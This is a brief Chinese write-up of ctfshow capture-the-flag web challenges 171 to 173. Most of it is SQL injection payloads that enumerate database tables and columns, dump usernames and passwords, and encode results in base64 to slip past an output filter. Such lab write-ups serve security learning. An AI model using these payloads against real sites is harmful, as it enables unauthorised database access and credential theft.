|
web171
简单的注入
//查表名
payload =" 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+"
//查列名
payload =" 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+"
//查flag
payload =" 1' union select id,username,password from ctfshow_user --+"
web172
根据题目提示看到返回的信息不包含flag
利用
1' order by 1 --+ //回显正常
1' order by 1,2 --+ //回显正常
1' order by 1,2,3 --+ //回显错误
查回显位为2,再根据171中的步骤查数据库,表名,列名。
//查询返回的结果不能有flag,可以利用base64或hex绕过
payload =" 1' union select to_base64(username),to_base64(password) from ctfshow_user2 --+"
web173
通过
1' order by 1--+
1' order by 1,2--+
1' order by 1,2,3--+
查询得出是三个回显位,其它都是和web172中的类似。
|